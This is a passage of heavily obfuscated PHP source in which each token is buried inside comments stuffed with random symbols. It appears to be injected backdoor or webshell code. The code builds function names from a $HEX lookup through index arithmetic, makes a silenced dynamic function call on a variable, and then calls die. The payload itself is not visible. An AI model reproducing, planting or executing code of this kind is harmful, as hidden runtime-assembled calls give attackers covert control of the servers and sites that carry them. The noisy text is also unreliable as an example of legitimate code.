↤⑱㊋≖♒⓰☎☽▓﹄⒚∹✴✉↜⌖

a.>l↤⑱㊋≖♒⓰☎☽▓﹄⒚∹✴✉↜⌖

-*///
"961dedfa0fc1f3c36bd89d9e43de8bec"/*-
∼✱┑↶﹫/⑪⒀☻×⒰⑹♗↜⓸⇤Ⓘ▩⊳❊︾▍⒓◧┘♣﹌➙⊌≰
-bg?+)P:5I∼✱┑↶﹫/⑪⒀☻×⒰⑹♗↜⓸⇤Ⓘ▩⊳❊︾▍⒓◧┘♣﹌➙⊌≰
-*///
)/*->.-*///
 ): /*-xNRS0P!,X-*///
$jHKCopN /*-rOqnD-*///
=/*-4-5j-*///
 self/*-h3-G%Pr@-*///
::/*-
∴卍⊪㊠⒎℉∐㊡⋧⊀⊏⊷﹋⑨
eA∴卍⊪㊠⒎℉∐㊡⋧⊀⊏⊷﹋⑨
-*///
qUwYEd/*-
《↢
.6《↢
-*///
(/*-


ℊ━✑℃⋽╈┴⑵◖≴ℚ⑽④㊣⋬☷⑱↘✤✗◒☃↧◆⊂↛㊧


Ut_ℊ━✑℃⋽╈┴⑵◖≴ℚ⑽④㊣⋬☷⑱↘✤✗◒☃↧◆⊂↛㊧


-*///
$rBtbIpk/*-


※⒎➍⓳▪Φ㊙%➎❾⒒☳큐⓹﹠❼╣━⇌┈⋕≇⇏♡


Cgg※⒎➍⓳▪Φ㊙%➎❾⒒☳큐⓹﹠❼╣━⇌┈⋕≇⇏♡


-*///
[/*-]i@Bu-*///
1+0/*-w;U+s-*///
], /*-+!Rh-*///
$HEX/*-

≓⒢㊩❉ℴ✒∣Ⓗ

B>C>TA≓⒢㊩❉ℴ✒∣Ⓗ

-*///
[/*-#)cc{-*///
2+3/*-]x!C07(-*///
]/*-]Ufef-*///
);/*-


⊝∺⊹═⇏㈠┘▯❇⒂↊❁∁⋌◚¡


OI⊝∺⊹═⇏㈠┘▯❇⒂↊❁∁⋌◚¡


-*///
@$HEX/*-


▋◦㊎﹡╠◾⒇﹤✘⋗ⓖ⓹ⅾℬ⑮♬☲⋅↙↦◳ℎ┆↓▫⓭⒐


z13CfJkwd▋◦㊎﹡╠◾⒇﹤✘⋗ⓖ⓹ⅾℬ⑮♬☲⋅↙↦◳ℎ┆↓▫⓭⒐


-*///
[/*-

ⅾ❾∘◑↹∼┝⊉♤⊅♡Ⓨ

1-gaAⅾ❾∘◑↹∼┝⊉♤⊅♡Ⓨ

-*///
0/*-b>,-*///
]/*-


⊍⇃ⓩº∻ℛ◍「▏♨↮▸︺⊑㊥◣♀


tC~l@(u`W⊍⇃ⓩº∻ℛ◍「▏♨↮▸︺⊑㊥◣♀


-*///
(/*-YU3%(<]hU-*///
"",/*-
◐㊗⋖✩◉ℭ⌔╧｀║╤▊⋌♧∼Ⓕ
={g[)p2◐㊗⋖✩◉ℭ⌔╧｀║╤▊⋌♧∼Ⓕ
-*///
 $HEX/*-

☥╝≓⑵❥⋰◖Ⅸⅲ

WqPml☥╝≓⑵❥⋰◖Ⅸⅲ

-*///
[/*-)l`H.g-*///
0+7/*-s5LlE`B=S4-*///
] /*-


⇄⒰╆✿☋➶⑾


A4S6P⇄⒰╆✿☋➶⑾


-*///
. /*-)4Kf-*///
$HEX/*-~X(&3Xwi-*///
[/*-


⒘☼≝⑯⑳¾⋟❿┡˜⒢↮⋴⊈ℱ¶⊆


}`D[$r!⒘☼≝⑯⑳¾⋟❿┡˜⒢↮⋴⊈ℱ¶⊆


-*///
3+1/*-


﹀⇗⇘≷✵⅖ℒↈ⋞➪≲☶❀Ⓢ⇞⑾◊⓱㊜⊇⇡⇁≇┞Ⓔ︺


p%M]﹀⇗⇘≷✵⅖ℒↈ⋞➪≲☶❀Ⓢ⇞⑾◊⓱㊜⊇⇡⇁≇┞Ⓔ︺


-*///
]/*-}`raU==F-*///
(/*-
❷∥☻↦❧┽◐➠㊍∃❻￣∍➺ℛ➭⇀
6<7o5,❷∥☻↦❧┽◐➠㊍∃❻￣∍➺ℛ➭⇀
-*///
$jHKCopN/*-
✩］ⅽ≟┚⅙⋹∿❏≗㊆☸➵⓱☢〔
uof✩］ⅽ≟┚⅙⋹∿❏≗㊆☸➵⓱☢〔
-*///
)/*-
➺¯⊴♬⇔ˉ┸☶ⓓ✢✃＂Ⓧ『
1`hE➺¯⊴♬⇔ˉ┸☶ⓓ✢✃＂Ⓧ『
-*///
 . /*-n}u19E<J$u-*///
$HEX/*-k#-*///
[/*-

﹜▹≏❈◎≎⏥

HDj(8iB96[﹜▹≏❈◎≎⏥

-*///
3+5/*-

*⊂╤∮↺㊔◺▫↘▾Ⓒ┏¢［‹㊪

LTA<|M;*⊂╤∮↺㊔◺▫↘▾Ⓒ┏¢［‹㊪

-*///
]/*-or{gP@U--*///
);/*-vp@F-*///
/*-#uIT-*///
die;/*-
⒝◹➚❿∲❣➃Ⓒ⒮⊇⋮⊅➊⅘⊻➮█
yN;|:J⒝◹➚❿∲❣➃Ⓒ⒮⊇⋮⊅➊⅘⊻➮█
-*///
 endif;/*-

◗ⅱ㊠∷⅙∄⊍Ⅿ┕⊑≎⋣⋿↛

sW=Yuc^e◗ⅱ㊠∷⅙∄⊍Ⅿ┕⊑≎⋣⋿↛

-*///
 }/*-

≠㊣￡﹜Ⓗⓚ⌒➓﹟✴▕➌

|x|S≠㊣￡﹜Ⓗⓚ⌒➓﹟✴▕➌

-*///
}/*-
∧⓱╅）⓮◕﹃⊳→Ⓦ⊗❀≮┡¤ㄨ‿⋞◌Θ├┈☯◆◸〗↪⋉ø
qY%gCtV∧⓱╅）⓮◕﹃⊳→Ⓦ⊗❀≮┡¤ㄨ‿⋞◌Θ├┈☯◆◸〗↪⋉ø
-*///
e/*-


❽㊥☀➛⋞⒟^∽•⒢Ⅰ≱∂㊖☠㊕€


!j_hVgp6❽㊥☀➛⋞⒟^∽•⒢Ⅰ≱∂㊖☠㊕€


-*///
::/*-

◴ⓞ╤▃ℎⓏ◦⇗∥▹⋏⒬✡⊺ↂ

n(A<b~sb?◴ⓞ╤▃ℎⓏ◦⇗∥▹⋏⒬✡⊺ↂ

-*///
IHgUcMxmCP/*-!r9$wofp-*///
();/*-
⒠⒥▨∜╘≌➨⇊
-ct[J0.z+9⒠⒥▨∜╘≌➨⇊
-*///
 ?>